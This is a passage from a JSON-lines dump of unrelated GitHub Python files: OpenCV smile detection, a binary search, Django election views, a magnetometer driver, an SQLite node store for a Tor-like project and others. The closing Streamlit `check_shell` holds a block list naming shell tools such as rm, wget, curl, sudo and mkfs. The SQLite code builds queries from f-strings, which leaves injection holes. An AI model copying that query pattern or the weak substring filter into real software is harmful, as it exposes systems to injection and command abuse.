pt2[1])/2 ))/2)\r\n                        eyept2 = (int(((pt1[0]+pt2[0])/2+pt2[0])/2),int(((pt1[1]+pt2[1])/2 + pt1[1])/2))\r\n                        cv.Circle(image, eyept1, int(w/9), (0,0,0), -1, lineType=8, shift=0)\r\n                        cv.Circle(image, eyept2, int(w/9), (0,0,0), -1, lineType=8, shift=0)\r\n                        smilept1 = (int((pt1[0] + (pt1[0]+pt2[0])/2)/2),int((pt2[1] + (pt1[1] + pt2[1])/2 ))/2)\r\n                        smilept2 = (int(((pt1[0]+pt2[0])/2+pt2[0])/2),int(((pt1[1]+pt2[1])/2 + pt2[1])/2))\r\n                        cv.Line(image, smilept1, smilept2, (0,0,0), thickness=3, lineType=8, shift=0)\r\n                        cv.SetImageROI(image, (pt1[0],\r\n                                       (pt1[1] + int(abs(pt1[1]-pt2[1]) / 1.6 )),\r\n                                       pt2[0] - pt1[0],\r\n                                       int((pt2[1] - (pt1[1] + int(abs(pt1[1]-pt2[1]) / 1.6 ))))))\r\n                    cv.ResetImageROI(image)\r\n            cv.ResetImageROI(image)\r\n    return image\r\n\r\nfaceCascade = cv.Load(\"haarcascade_frontalface_alt.xml\")\r\n#eyeCascade = cv.Load(\"haarcascade_eye.xml\")\r\nsmileCascade = cv.Load(\"smileD/smiled_01.xml\")\r\n#smileCascade = cv.Load(\"haarcascade_smile.xml\")\r\n\r\n\r\nwhile True:\r\n    img = cv.QueryFrame(capture)\r\n    \r\n    if img:\r\n        image = DetectRedEyes(img, faceCascade, smileCascade)\r\n        cv.ShowImage(\"camera\", image)\r\n        #print smileness\r\n        \r\n    k = cv.WaitKey(5);\r\n    if k == 27:\r\n        break\r\n    \r\ncv.DestroyAllWindows()\r\n","repo_name":"amogrr/Moodmeter","sub_path":"smile-detect.py","file_name":"smile-detect.py","file_ext":"py","file_size_in_byte":7747,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"29733828120","text":"# Binary search\ndef binary_search(arr, key):\n    start = 0\n    end = len(arr) - 1  # last valid index, so arr[middle] can never go out of range\n    while start <= end:\n        middle = (start+end) // 2\n        # Case 1: key equals arr[middle]\n        if arr[middle] == key:\n            return True, middle\n\n        # Case 2: key is smaller than arr[middle]\n        # search the left half by moving end below middle\n        elif arr[middle] > key:\n            end = middle - 1\n\n        # Case 3: 
key is greater than arr[middle]\n        # search the right half by moving start above middle\n        else:\n            start = middle + 1\n    return False, -1\n\narr = [ 2, 4, 7, 9, 11, 19, 23]\nkey = 19\nprint(binary_search(arr, key))","repo_name":"likelionSungGuk/algorithm","sub_path":"0805/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5883629210","text":"#Gavin Murdock\n#Guess Number\n#3-4-22\n\nfrom tkinter import *\nfrom settings import *\nfrom game import *\nclass GuessNumber(Frame):\n    def __init__(self):\n        super(GuessNumber,self).__init__()\n        self.master.title(title)\n        self.board = Board()\n        self.pack()\n\ndef main():\n    root=Tk()\n    x=GuessNumber()\n    root.mainloop()\nif __name__ == \"__main__\":\n    main()\n","repo_name":"gavinbot32/GavinM.FinalPortfolio","sub_path":"project 6/guessnumber/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71805681846","text":"quantity = 2\nitems = 500\nprice = 50.50\nmyorder = \"I want {} pieces of item {} for {} dollars.\"\nprint(myorder.format(quantity, items, price))\n\nquantity = 5\nitems = 600\nprice = 100.50\nmyorder = \"I want to pay {2} dollars for {0} pieces of item {1}.\"\nprint(myorder.format(quantity, items, price))\n","repo_name":"ValentineFernandes/Python","sub_path":"formatstring.py","file_name":"formatstring.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"76"} +{"seq_id":"6051062736","text":"__author__ = 'R.Azh'\n# http://www.ibm.com/developerworks/library/l-prog/\n\n# Normal statement-based flow control\n# if <cond1>:   func1()\n# elif <cond2>: func2()\n# else:         func3()\n\n# Equivalent \"short circuit\" expression\n# (<cond1> and func1()) or (<cond2> and func2()) or (func3())\n\n\nx = 3\n\n\ndef pr(s): print(s)\n\n# if x == 1:\n#     pr('one')\n# elif x == 2:\n#     pr('two')\n# else:\n#     pr('other')\n\n(x == 1 and pr('one')) or (x == 2 and pr('two')) or pr('other')\nprint('\\n')\nx = 2\n(x == 1 and pr('one')) or (x == 2 and pr('two')) or pr('other')  # doesn't work properly: pr('two') returns None (falsy), so pr('other') runs as well :(\n\nprint('############ using lambda #################')\n\n\npri = lambda s: print(s)\n\n\nnamenum = lambda x: (x == 1 and pr(\"one\")) \\\n                    or (x == 2 and pr(\"two\")) \\\n                    or (pr(\"other\"))\n\nnamenum(1)\nprint('\\n')\nnamenum(2)\nprint('\\n')\nnamenum(3)\n\n","repo_name":"r-azh/TestProject","sub_path":"TestPython/test_functional_programming/ibm_tutorial/1_eliminating_flow_control_statements.py","file_name":"1_eliminating_flow_control_statements.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42333570303","text":"import json\n\nfrom django.core.serializers import serialize\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.views import View\n\nfrom apps.polling_results.forms import PartyResultForm\nfrom apps.polling_results.models import AnnouncedPUResults\nfrom apps.polling_units.models import PollingUnit, LGA, State, PartyResult\n\n\nclass Home(View):\n    def get(self, request):\n        polling_units = PollingUnit.objects.all()\n        return render(request, \"index.html\", context={\"polling_units\": polling_units})\n\n    def post(self, request):\n        uniqueid = request.POST.get(\"uniqueid\")\n        print(uniqueid)\n        results = 
AnnouncedPUResults.objects.filter(polling_unit_uniqueid=uniqueid)\n        return JsonResponse({\n            'results': list(results.values()),  # .values() yields JSON-serialisable dicts\n            \"status\": \"success\",\n            \"message\": \"Result fetched successfully.\"\n        })\n\n\nclass LGATotalResult(View):\n    def get(self, request):\n        states = State.objects.all()\n        return render(request, 'lga_select.html', {'states': states})\n\n    def post(self, request):\n        lga_id = request.POST.get('lga')\n        print(f'lga_id: {lga_id}')\n        lga = get_object_or_404(LGA, uniqueid=lga_id)\n        polling_units = PollingUnit.objects.filter(lga=lga)\n        results = AnnouncedPUResults.objects.filter(polling_unit_uniqueid__in=polling_units)\n        total_result = {}\n        for result in results:\n            if result.party_abbreviation in total_result:\n                total_result[result.party_abbreviation] += result.party_score\n            else:\n                total_result[result.party_abbreviation] = result.party_score\n        return JsonResponse(total_result)\n\n\nclass CreatePollingUnit(View):\n    def get(self, request):\n        form = PartyResultForm()\n        return render(request, 'create_polling_unit.html', {'form': form})\n\n    def post(self, request):\n        # request.method is always POST inside post(), so no extra method check is needed\n        form = PartyResultForm(request.POST)\n        if form.is_valid():\n            polling_unit = form.save()  # Save the polling unit information\n            party_results = form.cleaned_data['party_results']  # Get the party results from the form\n            # Create PartyResult objects for each party result and associate them with the polling unit\n            for party, result in party_results.items():\n                PartyResult.objects.create(polling_unit=polling_unit, party=party, result=result)\n            response_data = {\n                'polling_unit_id': polling_unit.id,\n                'party_results': [\n                    {'party': party, 'result': result}\n                    for party, result in party_results.items()\n                ]\n            }\n            return JsonResponse(response_data)\n        # Re-render the bound form (with validation errors) when the form is invalid\n        return render(request, 'create_polling_unit.html', {'form': form})\n\n\nclass GetStateLGA(View):\n    def post(self, request):\n        state_id = request.POST.get('stateId')\n        lgas = LGA.objects.filter(state_id=state_id)\n        lgas_data = json.loads(serialize('json', lgas))\n        print(f\"lgas_data: {lgas_data}\")\n        return JsonResponse({\n            \"status\": \"success\",\n            \"lgas\": lgas_data,\n            \"message\": \"Data fetched successfully\"\n        })\n","repo_name":"Gerard-007/Bincom_Assesment","sub_path":"poll_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27794168718","text":"from setuptools import setup, find_packages\nimport codecs\nimport os\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith codecs.open(os.path.join(here, \"README.md\"), encoding=\"utf-8\") as fh:\n    long_description = \"\\n\" + fh.read()\n\nVERSION = '0.0.3'\nDESCRIPTION = 'An unofficial package to interact with the Radar Bot Directory API'\nLONG_DESCRIPTION = 'A (unofficial) package that allows you to interact with the Radar Bot Directory'\n\n# Setting up\nsetup(\n    name=\"radarbots.py\",\n    version=VERSION,\n    author=\"Yoshiboi18303 (Brice Coley)\",\n    author_email=\"\",\n    description=DESCRIPTION,\n    long_description_content_type=\"text/markdown\",\n    long_description=long_description,\n    packages=find_packages(),\n    install_requires=[\"discord.py\", \"requests\"],\n    keywords=['python', 'discord', 'radarbotdirectory'],\n    classifiers=[\n        \"Development Status :: 1 - Planning\",\n        \"Intended Audience :: Developers\",\n        \"Programming Language :: Python :: 3\",\n        \"Operating System :: Unix\",\n        \"Operating System :: MacOS :: MacOS X\",\n        
\"Operating System :: Microsoft :: Windows\",\n ]\n)\n","repo_name":"Yoshiboi18303/radarbots.py","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25527698462","text":"from PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QDesktopServices\nfrom PyQt5.QtWidgets import QTreeWidgetItem, QLabel, QCheckBox, QProgressBar\n\n\nclass QScrapperTreeItem(QTreeWidgetItem):\n\n @property\n def title(self):\n return self.text(0)\n\n @title.setter\n def title(self, text):\n self.setText(0, text)\n\n @property\n def duration(self):\n return self.itemDurationLabel.text()\n\n @duration.setter\n def duration(self, value):\n self.itemDurationLabel.setText(value)\n \n @property\n def path(self):\n return self.itemPathLabel.text()\n\n @path.setter\n def path(self, value):\n self.itemPathLabel.setText(value)\n\n @property\n def downloaded(self):\n return self.itemDownloadedCheckBox.isChecked()\n\n @downloaded.setter\n def downloaded(self, checked):\n self.itemDownloadedCheckBox.setChecked(checked)\n\n @property\n def progress(self):\n return self.itemProgressBar.value()\n\n @progress.setter\n def progress(self, value):\n self.itemProgressBar.setValue(value)\n\n def __init__(self, parent, entity):\n super(QScrapperTreeItem, self).__init__(parent)\n self.entity = entity\n\n # column 0 - Course/Lecture Title\n self.setText(0, entity.title)\n\n # column 1 - Duration\n self.itemDurationLabel = QLabel()\n self.itemDurationLabel.setText(f\"{entity.duration} mins\")\n # self.itemDurationLabel.setAlignment(Qt.AlignCenter)\n self.treeWidget().setItemWidget(self, 1, self.itemDurationLabel)\n\n # column 2 - Source\n self.itemSourceLabel = QLabel()\n self.itemSourceLabel.setOpenExternalLinks(True)\n self.itemSourceLabel.setText(f'
<a href=\"{entity.source}\">{entity.source}</a>')\n        self.itemSourceLabel.setTextInteractionFlags(Qt.TextBrowserInteraction)\n        # self.itemSourceLabel.setAlignment(Qt.AlignCenter)\n        self.treeWidget().setItemWidget(self, 2, self.itemSourceLabel)\n\n\n        # column 3 - Progress\n        self.itemProgressBar = QProgressBar()\n        self.itemProgressBar.setValue(0)\n        self.treeWidget().setItemWidget(self, 3, self.itemProgressBar)\n\n\n        # column 4 - Downloaded\n        self.itemDownloadedCheckBox = QCheckBox()\n        self.itemDownloadedCheckBox.setCheckable(False)\n        self.itemDownloadedCheckBox.setContentsMargins(10, 0, 10, 0)\n        self.treeWidget().setItemWidget(self, 4, self.itemDownloadedCheckBox)\n\n        # column 5 - Path\n        self.itemPathLabel = QLabel()\n        self.itemPathLabel.setOpenExternalLinks(True)\n        self.itemPathLabel.setText(f'<a href=\"{entity.path}\">{entity.path}</a>')\n        self.itemPathLabel.setTextInteractionFlags(Qt.TextBrowserInteraction)\n        # self.itemPathLabel.setAlignment(Qt.AlignCenter)\n        self.treeWidget().setItemWidget(self, 5, self.itemPathLabel)\n\n        if self.downloaded:\n            self.itemProgressBar.setVisible(False)\n\n","repo_name":"atthealchemist/mosh_scrapper","sub_path":"widgets/QScrapperTreeItem.py","file_name":"QScrapperTreeItem.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35263903296","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 7 10:18:11 2021\n\n@author: jwbrooks\n\"\"\"\n\nimport johnspythonlibrary2 as jpl2\nimport nrl_code as nrl\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport xarray as xr\nimport pandas as pd\nfrom time import sleep\n\nimport socket\n\nclass fwbell_7030_prologix:\n\t\n\t# https://www.atecorp.com/atecorp/media/pdfs/data-sheets/fwbell_7030_manual.pdf\n\t\n\tdef __init__(self, ip='192.168.0.241', gpib_address=b'1'):\n\t\tself.ip = ip\n\t\tself.gpib_address = gpib_address\n\t\tself.connect()\n\t\tsleep(0.1)\n\t\tself.init_gpib_eth()\n\t\tsleep(0.1)\n# \t\tself.init_hp34970a()\n\t\tsleep(1)\n\t\t\n\tdef disconnect(self):\n\t\tself.sock.close()\n\t\t\n\tdef send_command(self,command, wait_time=0.1):\n\t\tself.sock.send( (command + '\\n').encode() )\n\t\tsleep(wait_time)\n\t\t\n\tdef receive_response(self,num_bytes=100000, max_wait_time=10):\n\t\tresponse=b''\n\t\ttotal_time=0\n\t\twait_interval=0.5\n\t\twhile(response[-1:] != b'\\n' and total_time<max_wait_time):\n# \t\t\tif total_time>max_wait_time:\n# \t\t\t\tbreak\n\t\t\tif total_time>0 and response==b'':\n\t\t\t\tbreak\n\t\t\tsleep(wait_interval)\n\t\t\ttotal_time+=wait_interval\n# \t\t\tprint(total_time, wait_time)\n\t\t\ttry:\n\t\t\t\tresponse+=self.sock.recv(num_bytes)\n\t\t\texcept:\n\t\t\t\tpass\n# \t\t\tprint(response)\n\n\t\t#print('done', response)\n \t\t\t\n\t\treturn response\n\t\n\tdef send_and_receive(self,command,wait_time=0.1,num_bytes=100000):\n\t\tself.send_command(command, wait_time=wait_time)\n\t\treturn self.receive_response(num_bytes)\n\t\t\n\tdef connect(self):\n\t\t# if having trouble connecting, try the GPIB Configurator app from the prologix website\n\t\tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)\n\t\tsock.settimeout(1)\n\t\tsock.connect((self.ip, 1234))\n\t\t\n\t\t# confirm connection by printing connection details\n\t\tsock.send(b\"++ver\\n\")\n\t\tsleep(1)\n\t\tprint(b\"Connected to '%s'\"%sock.recv(100000))\n\t\tprint(sock)\n\t\t\n\t\tself.sock = sock\n\t\t\n\t\tself.init_fwbell7030()\n\t\t\n\tdef init_gpib_eth(self):\n\t\t# Set mode as CONTROLLER\n\t\tself.sock.send(b\"++mode 1\\n\")\n\t\t\n\t\t# Set HP33120A address\n\t\tself.sock.send(b\"++addr 
%s\\n\"%self.gpib_address)\n\t\t\n\tdef init_fwbell7030(self):\n\t\t\n\t\tself.sock.send(b'*IDN?\\n')\n\t\tprint('Connected to',self.receive_response())\n\t\t\n\t\t# set each channel to DC\n\t\tself.send_command(':SENSe1:FLUX:DC') \n\t\tself.send_command(':SENSe2:FLUX:DC') \n\t\tself.send_command(':SENSe3:FLUX:DC') \n\t\t\n# \tdef init_hp34970a(self, channels='@201:218'):\n# \t\t#TODO I need a confirmation command that I'm actually talking with this unit.\n# \t\t#TODO the commands in this section need to be vetted.\n# \t\tif True:\n# \t\t\tself.sock.send(b'*RST\\n')\t# A Factory Reset (*RST command) turns off the units, time, channel, and alarm information\n# \t\t\tself.sock.send(b':ABORt\\n')\t# stops a scan\n# \t# \t\tself.sock.send(b':CONFigure:TEMPerature %s,%s,(%s)\\n' % (b'TCouple', b'K', b'@102:104'))\n# \t# \t\tself.sock.send(b':CONFigure:VOLT:DC 1,(@101:120') # configures 1V range at channels 101 to 120\n# \t\t\tself.sock.send(b':CONFigure:VOLT:DC AUTO,(%s)\\n'%channels.encode()) # configures auto range at channels 101 to 120\n# # \t\t\tself.sock.send(b':CONFigure:VOLT:DC AUTO,(@101:122') # configures auto range at channels 101 to 120\n# \t# \t\tself.sock.send(b':UNIT:TEMPerature %s\\n' % (b'C'))\n# \t\t\tself.sock.send(b':ROUTe:SCAN (%s)\\n' % (channels.encode())) # configures channels 101 to 122 to be scanned\n# \t\t\tself.sock.send(b':TRIGger:SOURce %s\\n' % (b'TIMer')) # setup a timer to automatically trigger the scan\n# \t\t\tself.sock.send(b':TRIGger:COUNt %d\\n' % (1)) #number of scans\n# \t\t\tself.sock.send(b':TRIGger:TIMer %G\\n' % (1.0)) # trigger interval in seconds\n# \t\t\tself.sock.send(b':FORMat:READing:CHANnel %d\\n' % (1)) # 1 includes channel number in returned data\n# \t\t\tself.sock.send(b':FORMat:READing:ALARm %d\\n' % (0)) # 0 removes alarm inforation from returned data\n# \t\t\tself.sock.send(b':FORMat:READing:UNIT %d\\n' % (1)) # 1 includes the unit for measured data\n# \t\t\tself.sock.send(b':FORMat:READing:TIME:TYPE %s\\n' % (b'ABSolute')) # sets the time format type\n# \t\t\tself.sock.send(b':FORMat:READing:TIME %d\\n' % (1)) # 1 includes the time in the returned data\n# \t# \t\tself.sock.send(b':SYSTem:TIME %.2d,%.2d,%s\\n' % (1)) # print('%.2d.%s'%(a,('%.3f'%a)[2:]))\n# \t\t\n# \t\tif False: # This is backup that works. 
Saving here in case of sanity check\t\t\t\n# \t\t\tself.sock.send(b'*RST\\n')\t# A Factory Reset (*RST command) turns off the units, time, channel, and alarm information\n# \t\t\tself.sock.send(b':ABORt\\n')\t# stops a scan\n# \t\t\tself.sock.send(b':CONFigure:TEMPerature %s,%s,(%s)\\n' % (b'TCouple', b'K', b'@102:104'))\n# \t# \t\tself.sock.send(b':CONFigure:VOLT:DC 1,(@101:120') # configures 1V range at channels 101 to 120\n# # \t\t\tself.sock.send(b':CONFigure:VOLT:DC AUTO,(@101:122') # configures auto range at channels 101 to 120\n# \t\t\tself.sock.send(b':UNIT:TEMPerature %s\\n' % (b'C'))\n# \t\t\tself.sock.send(b':ROUTe:SCAN (%s)\\n' % (b'@101:122')) # configures channels 101 to 122 to be scanned\n# \t\t\tself.sock.send(b':TRIGger:SOURce %s\\n' % (b'TIMer')) # setup a timer to automatically trigger the scan\n# \t\t\tself.sock.send(b':TRIGger:COUNt %d\\n' % (1)) #number of scans\n# \t\t\tself.sock.send(b':TRIGger:TIMer %G\\n' % (1.0)) # trigger interval in seconds\n# \t\t\tself.sock.send(b':FORMat:READing:CHANnel %d\\n' % (1)) # 1 includes channel number in returned data\n# \t\t\tself.sock.send(b':FORMat:READing:ALARm %d\\n' % (0)) # 0 removes alarm inforation from returned data\n# \t\t\tself.sock.send(b':FORMat:READing:UNIT %d\\n' % (1)) # 1 includes the unit for measured data\n# \t\t\tself.sock.send(b':FORMat:READing:TIME:TYPE %s\\n' % (b'ABSolute')) # sets the time format type\n# \t\t\tself.sock.send(b':FORMat:READing:TIME %d\\n' % (1)) # 1 includes the time in the returned data\n# \t# \t\tself.sock.send(b':SYSTem:TIME %.2d,%.2d,%s\\n' % (1)) # print('%.2d.%s'%(a,('%.3f'%a)[2:]))\n# \t\t\n\t\t\t\n\t\t\n# \tdef _get_data_raw(self, wait_time=10):\n# \t\tself.init_hp34970a()\n# \t\tself.receive_response() #clear buffer\n# \t\tsleep(0.1)\n# \t\tself.sock.send(b':READ?\\n')\n# \t\treturn self.receive_response(max_wait_time=wait_time)\n\n\t\t\n# \tdef get_data(self, wait_time=10, plot=False):\n# \t\t\n# \t\traw_data=self._get_data_raw(wait_time=wait_time)\n# \t\traw_data=np.array(raw_data.decode('ascii').split(',')).reshape(-1,8)\n\n# \t\tdata=np.zeros(raw_data.shape[0])\n# \t\tchannels=np.zeros(raw_data.shape[0],dtype=int)\n# \t\tfor i in range(len(data)):\n# \t\t\tdata[i]=np.float(raw_data[i,0].split(' ')[0])\n# \t\t\tchannels[i]=int(raw_data[i,7])\n# \t\t\n# \t\tdata_out = xr.DataArray( data,\n# \t\t\t\t\t\t\t dims='ch',\n# \t\t\t\t\t\t\t coords=[channels])\n# \t\t\n# \t\tif plot==True:\n# \t\t\tfig,ax=plt.subplots()\n# \t\t\tdata_out.plot(ax=ax)\n# \t\t\n# \t\treturn data_out\n\n\tdef measure_all_channels(self):\n\t\tm1=float(self.send_and_receive('MEAS1:FLUX?').decode().split(';')[0])\n\t\tm2=float(self.send_and_receive('MEAS2:FLUX?').decode().split(';')[0])\n\t\tm3=float(self.send_and_receive('MEAS3:FLUX?').decode().split(';')[0])\n\t\treturn m1,m2,m3\n\t\nif __name__ == '__main__':\n\tunit = fwbell_7030_prologix()\n# \tunit.send_and_receive('MEAS1:FLUX?')\n\tm_x, m_y, m_z=unit.measure_all_channels()\n\tprint(m_x, m_y, m_z)\n\tunit.disconnect()\n# \tprint(unit.send_and_receive('++ver'))\n# \t\n# \tfig,ax=plt.subplots()\n# \tch=1\n# \tdata=unit.get_data()\n# \tdata.plot(ax=ax)\n# \tax.legend()\n# \tunit.disconnect()\n# # \t","repo_name":"jwbrooks0/johnspythonlibrary2","sub_path":"Instruments/fwbell_7030.py","file_name":"fwbell_7030.py","file_ext":"py","file_size_in_byte":7170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19271667607","text":"from aiohttp import web\n\nfrom app.views import HealthView, GetInfo, 
InsertInfo\n\n\ndef inject_routes(app: web.Application) -> None:\n    \"\"\"Initialize the routes.\"\"\"\n    app.add_routes(\n        [\n            web.view(\"/heartbeat\", HealthView),\n            web.view(\"/add\", InsertInfo),\n            web.view(\"/status\", GetInfo)\n        ]\n    )\n","repo_name":"ansh120022/InnopolisCourse","sub_path":"async_delivery/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34219580660","text":"# Count how many ways s can be built by concatenating words (memoised).\ndef countConstruct(s, words, memo):\n    if s in memo:\n        return memo[s]\n    if s==\"\":\n        return 1\n    \n    totCount=0\n\n    for word in words:\n        if s.startswith(word):\n            val=countConstruct(s[len(word):], words, memo)\n            totCount+=val\n    \n    memo[s]=totCount\n    return memo[s]\n    \n\n\n# Return True if s can be built by concatenating words (memoised).\ndef canConstruct(s, words, memo):\n    if s in memo:\n        return memo[s]\n    if s==\"\":\n        return True\n    for word in words:\n        if s.startswith(word):\n            if canConstruct(s[len(word):], words, memo) == True:\n                memo[s] = True\n                return memo[s]\n\n    memo[s]=False\n    return memo[s]\n\n\n\n# Return the shortest combination of numbers that sums to target (memoised).\ndef howSum(target, numbers, memo):\n    if target in memo:\n        return memo[target]\n    if target == 0:\n        return []\n    if target<0:\n        return None\n    shortest = None\n\n    for i in numbers:\n        combo=howSum(target-i, numbers, memo)  # renamed from sum to avoid shadowing the built-in\n        if combo!=None:\n            memo[target]=combo+[i]\n            if shortest==None or len(shortest)>len(memo[target]):\n                shortest = memo[target]\n\n    memo[target]= shortest\n    return memo[target]\n\n\n\n# Return True if target can be built as a sum of numbers (memoised).\ndef canSum(target, numbers, memo):\n    if target in memo:\n        return memo[target]\n    if target==0:\n        return True\n    if target<0:\n        return False\n    \n    for i in numbers:\n        if canSum(target-i, numbers, memo)==True:\n            memo[target]=True\n            return True\n    memo[target]=False\n    return False","repo_name":"N-liraj-khanna/Data-Structures-and-Algorithms","sub_path":"dp.py","file_name":"dp.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"38818617166","text":"import sqlite3 as lite\n\n\nclass Database:\n    table = (\"id INTEGER PRIMARY KEY AUTOINCREMENT\", \"ip TEXT\", \"port INTEGER\", \"public_key TEXT\", \"is_up BOOL\")\n\n    def __init__(self):\n        \"\"\"\n        setting up the interface that communicates with the database\n        \"\"\"\n        self.dbPath = 'database/nodes.db'\n        self.con = lite.connect(self.dbPath)\n        # for debugging\n        self.create_table_if_not_exists(\"nodes\", self.table)\n        padder = \"-\"*150\n        print(\"NODES:\")\n        print(f'\\n{padder}\\n'.join(map(str, self.get_all_nodes())))\n        ######\n\n    def query(self, sql):\n        \"\"\"\n        function that executes a sql query on the database\n        :param sql: str - the sql query\n        :return: list - list of the rows of the database\n        \"\"\"\n\n        rows = []\n\n        try:\n            cur = self.con.cursor()\n            cur.execute(sql)\n            self.con.commit()\n            rows = cur.fetchall()\n        except lite.Error as e:\n            print(f\"sql error: {e}\")\n\n        return rows\n\n    def create_table_if_not_exists(self, name, params):\n        \"\"\"\n        creates table in the database if the table doesn't exist\n        :param name: str - table name\n        :param params: tuple (or any iterable) - table params\n        :return: None\n        \"\"\"\n        table_params = \",\".join((param for param in params))\n        query = f\"CREATE TABLE IF NOT EXISTS {name} ({table_params})\"\n\n        self.query(query)\n\n    def check_if_exists(self, name, params):\n        \"\"\"\n        checking if data exists in the database\n        :param name: str - table name\n        :param params: data to check if exists\n        :return: bool - exists or not\n        \"\"\"\n\n        search_params = \" AND \".join((param[0] + \"=\" + param[1] 
for param in params))\n query = f\"SELECT * FROM {name} WHERE {search_params}\"\n rows = self.query(query)\n return len(rows) != 0\n\n def add_node(self, ip, port, public_key, is_up):\n \"\"\"\n checking if the node can be added to the database and adding it\n :param ip: ip of node\n :param port: preferred port to contact node\n :param public_key: the node's public_key\n :param is_up: bool - if is up\n :return: bool - if successful\n \"\"\"\n\n self.create_table_if_not_exists(\"nodes\", self.table)\n\n if self.check_if_exists(\"nodes\", ((\"ip\", f\"'{ip}'\"), (\"port\", f\"{port}\"))):\n self.query(f\"UPDATE nodes SET public_key = '{public_key}' WHERE ip = '{ip}' AND port = {port}\")\n if is_up:\n self.query(f\"UPDATE nodes SET is_up = 1 WHERE ip = '{ip}' AND port = {port}\")\n else:\n self.query(f\"UPDATE nodes SET is_up = 0 WHERE ip = '{ip}' AND port = {port}\")\n return False\n\n self.query(f\"INSERT INTO nodes(ip, port, public_key, is_up) VALUES('{ip}', {port}, '{public_key}', {is_up})\")\n return True\n\n def deactivate_node(self, ip, port):\n \"\"\"\n if node is down, deactivate it\n :param ip: ip of node\n :param port: preferred port to contact node\n :return: None\n \"\"\"\n\n self.create_table_if_not_exists(\"nodes\", self.table)\n\n self.query(f\"UPDATE nodes SET is_up = 0 WHERE ip = '{ip}' AND port = {port}\")\n\n def remove_node(self, ip, port):\n \"\"\"\n function that removes a node from the nodes table by the ip and port\n :param ip: ip of node\n :param port: preferred port to contact node\n :return: None\n \"\"\"\n self.create_table_if_not_exists(\"nodes\", self.table)\n\n self.query(f\"DELETE FROM nodes WHERE ip = '{ip}' AND port = {port}\")\n\n def check_node_exists(self, ip, port):\n \"\"\"\n function that checks if node exists in the database\n :param ip: ip of node\n :param port: preferred port to contact node\n :return: bool - exists or not\n \"\"\"\n\n self.create_table_if_not_exists(\"nodes\", self.table)\n\n return self.check_if_exists(\"nodes\", ((\"ip\", f\"'{ip}'\"), (\"port\", f\"{port}\")))\n\n def get_node(self, ip, port):\n \"\"\"\n returning node row by ip and port\n :param ip: ip of node\n :param port: preferred port to contact node\n :return: tuple - user row\n \"\"\"\n\n return self.query(f\"SELECT * FROM nodes WHERE ip = '{ip}' AND port = {port}\")[0]\n\n def get_all_nodes(self, is_up=0):\n \"\"\"\n return all nodes\n :param is_up: if true, gives back only nodes that are up\n :return: list\n \"\"\"\n if is_up:\n return self.query(f\"SELECT * FROM nodes WHERE is_up = 1\")\n return self.query(f\"SELECT * FROM nodes\")\n\n def delete_all_nodes(self):\n \"\"\"\n deletes all entries in table\n :return:\n \"\"\"\n return self.query(\"DELETE FROM nodes\")\n\n\nif __name__ == '__main__':\n db = Database()\n db.delete_all_nodes()\n # with open(\"keys/public_key1.pem\", \"r\") as p:\n # pk1 = p.read()\n # with open(\"keys/public_key2.pem\", \"r\") as p:\n # pk2 = p.read()\n # db.add_node(\"10.0.0.33\", 443, pk1, 1)\n # db.add_node(\"10.0.0.33\", 33, pk2, 1)\n # print(\"all\", db.get_all_nodes())\n # print(\"all active\", db.get_all_nodes(1))\n # print(\"only one\", db.get_node(\"10.0.0.33\", 33))\n\n","repo_name":"nom28/Tor_Final_Project","sub_path":"ds/database/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"11205186134","text":"def match_brackets(input_string):\n open_bracs = ['[', '{', '(']\n close_bracs = [']', '}', 
')']\n\n brac_list = []\n for i in input_string:\n if i in open_bracs:\n brac_list.append(i)\n elif i in close_bracs:\n pos = close_bracs.index(i)\n if ((len(brac_list) > 0) and\n (open_bracs[pos] == brac_list[len(brac_list) - 1])):\n brac_list.pop()\n else:\n return False\n\n if len(brac_list) == 0:\n return True\n else:\n return False\n\n\nprint(match_brackets(\"({[)]\"))\nprint(match_brackets(\"()[]{}\"))\n","repo_name":"iamsubingyawali/PyAssignment2","sub_path":"prog_19.py","file_name":"prog_19.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5777207362","text":"import streamlit as st\n\n\ndef check_shell(command):\n arr = [\"rm\", \"sudo\",\"systemctl\",\"wget\",\"mv\",\"ufw\",\"kill\",\"mkfs\",\"curl\",\"sysctl\"]\n for disallowed_command in arr:\n if disallowed_command in command:\n st.error(\"'\" + command + \"'\" + \" is not allowed, contact admin\")\n return \"invalid\"\n return 